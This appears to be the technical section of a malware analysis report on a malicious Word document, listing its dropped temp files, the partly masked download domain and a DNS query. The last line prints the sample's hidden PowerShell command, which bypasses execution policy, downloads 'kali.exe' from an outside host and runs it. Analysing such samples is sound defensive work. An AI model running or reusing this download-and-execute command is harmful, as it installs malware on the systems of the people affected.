Technical Information
- http://ge######mceders.honor.es/kali.exe as kali.exe
- <Current directory>\~wrd0000.tmp
- <Current directory>\~wrd0002.tmp
- <Current directory>\~wrl0003.tmp
- <Current directory>\~wrl0003.tmp
- <Current directory>\~wrl0003.tmp
- <PATH_SAMPLE>.doc
- http://ge######mceders.honor.es/kali.exe
- DNS ASK ge######mceders.honor.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://ge######mceders.honor.es/kali.exe','kali.exe'); Start-Process kali.exe' (with hidden window)